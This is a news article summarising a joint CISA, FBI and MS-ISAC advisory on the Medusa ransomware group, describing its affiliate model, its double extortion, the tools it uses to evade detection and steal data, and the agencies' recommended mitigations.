The notorious Medusa ransomware group has severely impacted over 300 organizations, particularly in critical sectors like healthcare, manufacturing, and technology. This was revealed in a joint cybersecurity advisory released on Wednesday by the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC).
Since its emergence in 2021, Medusa, which is distinct from the MedusaLocker ransomware, has quickly evolved from a closed operation into a ransomware-as-a-service (RaaS) model. Although it now operates through affiliates, key operations such as ransom negotiations remain under the control of the developers. The advisory highlights that Medusa uses a double extortion approach, where it encrypts victim data and threatens to release exfiltrated data publicly if the ransom is not paid.
Medusa’s Tactics: How Attackers Gain Access
The advisory details how Medusa attackers, often called ‘Medusa actors,’ gain access to targeted environments. They frequently collaborate with initial access brokers from cybercriminal forums to infiltrate systems. During attacks, the group employs various legitimate software tools to move within networks. These tools include remote access programs like AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Additionally, Medusa actors utilize network scanning tools such as Advanced IP Scanner and SoftPerfect Network Scanner to gather detailed information about systems, users, and networks within the compromised environments.
Medusa’s Stealthy Methods: Avoiding Detection
Medusa attackers have mastered the use of living-off-the-land (LotL) techniques to remain undetected during their operations. They also use increasingly complex PowerShell commands, alongside “Bring Your Own Vulnerable Driver” (BYOVD) attacks. In these attacks, the actors exploit known vulnerabilities in drivers to disable security solutions like endpoint detection and response (EDR) products. This method allows them to operate freely without detection.
Notably, Symantec’s Threat Hunter team observed that Medusa’s activity surged by 42% year-over-year in 2024, with continued growth into January and February. The group’s use of both legitimate software and custom malicious tools, such as AVKill and POORTRY, is particularly alarming as they enable the disabling of security mechanisms that would otherwise thwart the attack.
Tools of the Trade: AVKill and RClone
In a recent attack on a healthcare provider, Symantec’s team found that the Medusa actors deployed tools like AVKill, POORTRY, and an unidentified driver to neutralize the organization’s security defenses. RClone, an open-source tool for file synchronization and transfer, was used to exfiltrate data from the compromised systems. In addition, PsExec was employed to remotely execute commands across the victim’s network. After the ransomware encrypted the targeted files, it deleted itself to further obscure its presence.
Cybersecurity Agencies Issue Urgent Mitigation Recommendations
In light of these findings, CISA, the FBI, and MS-ISAC have issued several crucial recommendations for organizations to combat the Medusa ransomware threat. These include disabling command-line and scripting activities to limit the effectiveness of LotL techniques. Since Medusa actors often rely on command-line utilities to escalate privileges and move laterally within networks, restricting these tools can impede the attackers’ ability to spread and escalate attacks.
By taking these preventive measures, organizations can reduce the likelihood of a successful Medusa attack and strengthen their overall cybersecurity defenses.
For more cybersecurity news, click here.